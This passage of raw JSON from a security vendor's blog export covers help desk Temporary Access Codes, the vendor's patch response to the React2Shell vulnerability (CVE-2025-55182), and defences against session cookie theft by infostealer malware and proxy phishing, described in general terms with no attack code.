groups and their details,” “Manage group membership”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to issue Temporary Access Codes (“Manage user's Temporary Access Code”)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More crucially, the custom helpdesk role would \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"no longer need\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to be assigned permissions to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset a user’s password (“Reset users' passwords”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign a temporary password to a user (“Set users' temporary password”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset the MFA factors of a user (“Reset users' authenticators”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enroll a user in MFA (“Enroll users' authenticators”)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an inbound caller has verified their identity, a TAC issued to a user for account recovery could be constrained to be:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only valid for a few minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used in conjunction with another previously enrolled factor (“authenticator method chaining”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used from a specific set of locations\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used from a registered or managed device\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For guidance on how to use TACs as an account recovery factor, please refer to the following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/create-custom-admin-roles-for-user-account-recovery-processes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"help desk article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Temporary Access Codes provide an opportunity to constrain the ability of help desk staff to reset user passwords and MFA factors."},"updatedAt":"2025-12-11T23:14:03.223Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/okta-response-to-react2shell","id":"ae240f16-af0c-5b54-bd73-54a4e658ff62","title":"Okta’s Response to React2Shell","date":"2025-12-05T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On December 3, 2025, the maintainers of React and Next.js disclosed a critical pre-authentication remote code execution (RCE) vulnerability in React Server Components (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-55182\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") with a CVSS score of 10.0.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerability impacts versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of RSC, as well as all frameworks that support React Server Components, including Next.js (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nextjs.org/blog/CVE-2025-66478\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-66478\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Response\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has upgraded all production systems to fixed versions,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has published actions required for application developers that rely on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/center/s/article/developer-statement-react-server-components-critical-vulnerability-cve-2025-55182-action-required\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Developer-Statement-React-Server-Components-Critical-Vulnerability-CVE-2025-55182-Action-Required-Okta?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" SDKs to build React or Next.js applications,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we have detected opportunistic scanning activity on non-vulnerable systems, we have not observed successful exploitation of this vulnerability against Auth0 or Okta services. \\n\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action for Auth0 and Okta SDKs users\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For actions required and developer guidance, please refer to the appropriate KnowledgeBase article:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/center/s/article/developer-statement-react-server-components-critical-vulnerability-cve-2025-55182-action-required\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 React Server Components Critical Vulnerability (CVE-2025-55182) Action Required\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Developer-Statement-React-Server-Components-Critical-Vulnerability-CVE-2025-55182-Action-Required-Okta?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta React Server Components Critical Vulnerability (CVE-2025-55182) Action Required\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Read on for Okta’s response to React2Shell (CVE-2025-55182) and to learn more about actions required by developers."},"updatedAt":"2025-12-05T12:38:36.424Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/sessioncookietheft","id":"f4032886-3e35-5313-b6d3-1d5ff60ff92b","title":"Defending against Session Hijacking","date":"2022-08-09T06:00:56+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-factor Authentication (MFA) is very effective at limiting what an adversary can do with a stolen password.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"According to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"research\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" commissioned by Google in 2019, MFA thwarted 99% of automated credential-based attacks and 93% of phishing campaigns. It remains one of the most essential and effective controls against account takeovers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In some circumstances (outlined below), MFA can be bypassed. Okta Threat Intelligence has observed the proliferation of malware designed to extract session cookies from the browser of an infected user, and increasing use of phishing techniques designed to bypass authenticators that rely on a shared secret.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both of these techniques rely on extracting a session cookie from the browser of a legitimate user that has already authenticated to an application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this article we will:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Explain how adversaries steal session cookies,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discuss how to defend against session cookie theft, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discuss approaches to detecting abuse of session cookies.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"About Session Cookies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session cookies are small blocks of data stored in a user’s browser after they sign-in to a web application. The cookie includes an identifier generated by the app that helps keep track of a signed-in user, ensuring they won’t need to sign-in again until the session expires or the user logs out.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If an attacker steals a session cookie and injects it into their browser, they can often access the same session as the legitimate user. The two most common techniques used to steal session cookies are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Malware infection on a legitimate user’s endpoint, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing attacks that use transparent HTTP proxies (adversary-in-the-middle attacks).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cookie-hungry Malware\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of the most prevalent malware families observed today include ‘infostealer’ modules that have the ability to extract cookies from browser sessions running on an infected machine. The majority of malware families the US Cybersecurity and Infrastructure Security Agency (CISA) listed in its \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa22-216a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Top 10 Malware Strains of 2021 report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are capable of stealing session cookies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This malware is often deployed via “cracked” (pirated) games or delivered as malspam. Once installed, these modules silently extract cookies, which are in turn bought and sold in dark web forums, occasionally accompanied by tools that attempt to mimic the browser configuration used by the target.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adversary-in-the-Middle Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers also use social engineering to obtain session cookies by directing users to a malicious website that is configured as a reverse proxy server. These phishing sites are able to relay requests between a targeted user and an impersonated web application. If a user is tricked into signing in to the legitimate web application via one of these malicious sites, the attacker can access the user’s credentials and the session token returned to the browser.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks can be effective against user accounts protected only by factors that rely on codes sent via SMS, email or authenticator apps.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In any successful attack, the attacker is subject to the constraints of the stolen session: both it's duration and the resources accessible during the session. If the legitimate user logs out (or is logged out by administrators), the session cookie is invalidated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defending Against Session Cookie Theft\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The advice below is also available to \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www-assets.okta.com/pdfs/sec.okta.com/Session_Cookie_Infographic_v2.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"download as an infographic\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Due to the variety of ways session cookies can be stolen, there is no single solution that will prevent their theft. We recommend a “defense in depth” approach to protecting your organization:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Endpoint protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" software can protect user devices against malware that extracts session cookies from the user’s browser. Okta offers \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with several EDR vendors that allow administrators to deny authentication requests from devices exhibiting poor security hygiene.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong authenticators\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" such as WebAuthn, U2F keys, smart cards: these offer the strongest resistance to “Adversary-in-the-Middle” attacks. Okta FastPass also offers strong phishing resistance \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"in most deployment scenarios\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication policies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can be used to restrict access to user accounts based on a range of customer-configurable prerequisites. We recommend administrators restrict access to applications to only those \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (with Okta FastPass) and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools, and if they are assessed to have a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong security posture\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". We also recommend forcing re-authentication every time a sensitive resource is accessed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny or perform step-up authentication on requests to access applications from rarely-used networks. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", access can be limited by location, ASN (Autonomous System Number), IP, and IP-Type (which identifies known anonymizing proxies).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/behavior-detection/configure-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to act (via step-up authentication) or alert (via System Log) when a user’s sign in behavior deviates from a previous pattern of activity.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fine-tune application session time-outs \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"based on the risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that unauthorized access to the data poses to the organization. This limits the window available for an attacker to exploit access to stolen session cookies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. No matter how advanced the attacker’s infrastructure, most cookie thieves rely on social engineering. Make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Abuse of Session Cookies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Logs often contain the first signs of cookie theft. Authentication and Access Requests to Okta are logged in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/Reports_SysLog.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which can be viewed in the admin console, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to security analytics tools or programmatically requested using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more advice on common avenues for detection, we recommend the following resources:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/telling-more-okta-detection-stories-google-chronicle\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Telling More Okta Detection Stories with Google Chronicle\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Real-Time Phishing Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When writing detections, try to enumerate the legitimate reasons in your environment why user attributes might change mid-session and alert on anything that 